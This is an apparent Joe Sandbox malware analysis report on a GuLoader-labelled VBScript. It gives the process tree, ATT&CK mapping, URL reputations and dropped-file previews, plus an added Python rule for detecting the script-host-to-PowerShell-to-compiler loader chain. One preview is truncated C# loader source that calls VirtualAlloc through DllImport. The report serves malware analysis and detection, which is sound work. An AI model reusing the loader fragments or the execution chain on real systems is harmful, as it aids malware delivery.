Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe with the same "$biliate = ..." command line, shown by the sandbox in lower case for this check (full text under Data Obfuscation)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe with the obfuscated "$Biliate = ..." command line (full text under Data Obfuscation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"
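The chain wscript.exe -> powershell.exe -> csc.exe -> cvtres.exe recorded above is what the signatures "Wscript starts Powershell (via cmd or directly)", "Very long command line found" and "Sigma detected: Dot net compiler compiles file from suspicious location" are built on. The Python below is an added example, not part of the report and not the logic of any published Sigma rule, of evaluating that chain on process-creation records with Sysmon Event ID 1 field names, reconstructed from the report's process tree. PIDs 8 (wscript.exe) and 2528 (powershell.exe) are the report's; the other PIDs, PID 1000 for the unobserved parent of wscript.exe, the padding of the PowerShell argument to the length class the report flags and the 2048-character threshold are assumptions made for the example.

```python
import re

# Constructed records with Sysmon Event ID 1 field names. Command lines are the
# report's (the PowerShell argument cut short and padded; the stray quote after
# the image path is how the report renders it).
EVENTS = [
    {"ProcessId": 8, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"'},
    {"ProcessId": 1001, "ParentProcessId": 8,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"CMD.EXE /c echo C:\Windows"},
    {"ProcessId": 2528, "ParentProcessId": 8,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn' + "x" * 4000},
    {"ProcessId": 1002, "ParentProcessId": 2528,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline'},
    {"ProcessId": 1003, "ParentProcessId": 1002,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "CommandLine": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
TEMP_DIR_RE = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
LONG_CMDLINE = 2048  # threshold chosen for this example, not the sandbox's


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate_event(event, parent):
    """Per-event rules; `parent` is the parent's record or None when unobserved."""
    image = basename(event["Image"])
    parent_image = basename(parent["Image"]) if parent else ""
    cmd = event["CommandLine"]
    hits = []
    if parent_image in SCRIPT_HOSTS and image in POWERSHELL | {"cmd.exe"}:
        hits.append("script_host_spawns_shell")
    if image in POWERSHELL and len(cmd) >= LONG_CMDLINE:
        hits.append("very_long_powershell_cmdline")
    if image in COMPILERS and TEMP_DIR_RE.search(cmd):
        hits.append("dotnet_compiler_input_in_temp")
    if image in COMPILERS and parent_image in POWERSHELL:
        hits.append("powershell_add_type_compile")
    return hits


def evaluate_all(events):
    by_pid = {e["ProcessId"]: e for e in events}
    return {e["ProcessId"]: evaluate_event(e, by_pid.get(e["ParentProcessId"]))
            for e in events}


def ancestry(events, pid):
    """Walk ParentProcessId upwards; return image basenames root-first."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain[::-1]


def loader_chain_detected(events):
    """True when a compiler's ancestry is script host -> PowerShell -> compiler
    and the compiler reads its input from a temp directory. cvtres.exe under
    csc.exe is normal compiler behaviour and is deliberately not a signal."""
    results = evaluate_all(events)
    for e in events:
        if basename(e["Image"]) not in COMPILERS:
            continue
        chain = ancestry(events, e["ProcessId"])
        if (len(chain) >= 3 and chain[-3] in SCRIPT_HOSTS and chain[-2] in POWERSHELL
                and "dotnet_compiler_input_in_temp" in results[e["ProcessId"]]):
            return True
    return False


if __name__ == "__main__":
    for pid, hits in evaluate_all(EVENTS).items():
        print(pid, hits)
    print("loader chain:", loader_chain_detected(EVENTS))
```

The per-event rules are noisy on their own (developers and PowerShell modules legitimately call Add-Type), which is why the correlation in loader_chain_detected requires the script-host ancestor as well as the temp-directory input before it reports the chain.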
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (flattened from the report's interactive matrix, listed per tactic column; the digits in front of an entry are the signature-count badges shown in that view, entries without digits are the matrix's unbadged cells)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 21 Command and Scripting Interpreter; 421 Scripting; 1 PowerShell; At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: 11 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 421 Scripting; 2 Obfuscated Files or Information
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Behavior Graph ID: 756154 | Sample: SIEM_PO00938467648.vbs | Start date: 29/11/2022 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures

Process tree as drawn in the graph (the numbers after a process name are the graph's count badges, see the legend):

wscript.exe 1 1 (started)
    signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
    -> powershell.exe 22 (started)
         dropped: C:\Users\user\AppData\...\jadyuuoq.cmdline, Unicode
         -> csc.exe 3 (started)
              dropped: C:\Users\user\AppData\Local\...\jadyuuoq.dll, PE32
              -> cvtres.exe 1 (started)
         -> conhost.exe (started)
    -> cmd.exe 1 (started)
         -> conhost.exe (started)

Source | Detection | Scanner | Label
SIEM_PO00938467648.vbs | 35% | ReversingLabs | Script-WScript.Trojan.GuLoader

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll | 100% | Joe Sandbox ML | -

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://crl.microsof | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png7z | 100% | Avira URL Cloud | malware
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html7z | powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.microsof | powershell.exe, 00000003.00000003.499891635.0000000007E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.485360796.0000000007E5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe (listed twice) | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe (listed twice) | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.823390885.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester7z | powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png7z | powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                No contacted IP infos
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:756154
                Start date and time:2022-11-29 18:22:11 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 23s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:SIEM_PO00938467648.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.expl.evad.winVBS@11/9@0/0
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 69
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Override analysis time to 240s for JS/VBS files not yet terminated
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                • Execution Graph export aborted for target powershell.exe, PID 2528 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
18:24:27 | API Interceptor | 32x Sleep call for process: powershell.exe modified
                No context
                No context
                No context
                No context
                No context
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):8003
                Entropy (8bit):4.842774286652891
                Encrypted:false
                SSDEEP:192:Jxoe5FVsm5emdgdVFn3eGOVpN6K3bkkjo5igkjDt4iWN3yBGHc9smgdcU6CupO0P:1EdVoGIpN6KQkj2Zkjh4iUxepib4J
                MD5:62F0B7274EE33977F05FE8727590EBA4
                SHA1:3D7D56215FAF3C0F11BBF6A16ABB09DF83E96BA7
                SHA-256:A59280899B286228ABA87CAC2EED2C3FEA4966BF427899B9B9AEF46AD0FD3E00
                SHA-512:001B11A26D8AF5D8FEE3B259D5E10EAA22801662C539BA70B7EBA0A330C9DD1B4F0CFB3B05B0B63CDA103B771506CF7A35A581DF7986E872A187E2E280D5493C
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Tue Nov 29 17:24:33 2022, 1st section name ".debug$S"
                Category:dropped
                Size (bytes):1324
                Entropy (8bit):3.996218436024883
                Encrypted:false
                SSDEEP:24:HEF69vZf14pDfHdzYhKPfeI+ycuZhNh6akS+LPNnq9ud:3B14t9+KPm1uloa3Eq9u
                MD5:E733462A8F00DEC1FC3565C028DDE8A1
                SHA1:8C4647CAF72EE736C2AF838FF03E3B17127276CF
                SHA-256:37F83C0D6CAB65759FAA603F14A42FD331171144D95310F68CA438C6C9056554
                SHA-512:57CD59B28F893F4A564B55454D40A83229B83C9EE93788D765AEA99C48AB4C9F1A219660ABF1FBE95CF0F07E49C198E4179E056636A39B84E6FE7F6D4C33C5E6
                Malicious:false
                Preview:L...Q@.c.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........S....c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP...................x.{..qeh.g..........4.......C:\Users\user\AppData\Local\Temp\RES8B47.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.a.d.y.u.u.o.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.1034732649057704
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryz6ak7Ynqq+LPN5Dlq5J:+RI+ycuZhNh6akS+LPNnqX
                MD5:A000E1959178D29C7BA215716568AB67
                SHA1:8A0A43A57EA1B760DF7DD1FCDACB6B0A8D959B6E
                SHA-256:E7C6DAF4DD3722664B5B9A8522889734B6894EF4865CF3039AE842ACEF9A9D75
                SHA-512:C598A213FAEC10450E95CEBC5CBA30B2DF8ADD3F2034A8573E4E6F712E60BCA39EFCB890F14A3DB34A24E2994D6A53E20537D86BD816798764962CA5FFB26F17
                Malicious:false
                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.a.d.y.u.u.o.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.a.d.y.u.u.o.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1049), with no line terminators
                Category:dropped
                Size (bytes):1052
                Entropy (8bit):4.997907941877808
                Encrypted:false
                SSDEEP:24:JVSgTlR8ZhIZFbamwTJI1ro8kkcw+n1csrsIuY:JVlTlR8DIZFbLwTJI1rb/P+n1BrsIX
                MD5:5CB0DD0B77A3DA8C76FA25C6482E90D5
                SHA1:309AAF2851C84D34E8C8FC38B102721126D3E145
                SHA-256:4A5B247BE5F2AD1BF7CB3E184F7F687B5D59C7DE795FD1EAF69B7B0E2F4F716E
                SHA-512:F4842683F2B44C5FE29A03CAC23BCE6358F2FFF9A4CD1232319591CB3A48834C95DC07DA3159584DE2AED4F0EBE9A7A517ED4676D38DC63B35BA405D5FA7BD19
                Malicious:false
                Preview:.using System;using System.Runtime.InteropServices;public static class Tueiron1 {[DllImport("user32")]public static extern int DestroyCaret();[DllImport("gdi32")]public static extern int ScaleWindowExtEx(int Drift,int Ambula,int Baso,int iagtta,int Vejmat158,int Mcgr);[DllImport("kernel32")]public static extern int HeapSize(int Prop,int Adres,int Tortri);[DllImport("shell32.dll")]public static extern void DragFinish(int Omdr);[DllImport("winmm.dll")]public static extern int mixerGetDevCaps(int Nitr,int Fel,int Afs93);[DllImport("kernel32")]public static extern int LockResource(int Lei);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("ADVAPI32.DLL")]public static extern void MapGenericMask(int Brink,int Midts);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int SetThreadAffinityMask(int Rebuil,int Semis);[DllImport("user32")]public static extern int Se
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                Category:dropped
                Size (bytes):369
                Entropy (8bit):5.219534290159127
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f9jx0zxs7+AEszIwkn23f9jDH:p37Lvkmb6KRf1jx0WZEif1jb
                MD5:71F10E9CBAE1F70E2596C2A61CC97420
                SHA1:FA92CD6FFD26D5C56701CB5FE4D572F729B119CE
                SHA-256:30B8926041F22070E9F6754C5D94C52BFAC40FBC3B48BEE485976A1DC1277915
                SHA-512:D1C7BB4EFC520E61083ABCE94399ED158DB27FE03E1B6116FE14AEE449B7AA91F56F7B42C1106FD48D12660C411C3F0E4D7911C82A32BA53E95FC5D3C10B2C78
                Malicious:true
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.0.cs"
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):4096
                Entropy (8bit):3.0786957689151206
                Encrypted:false
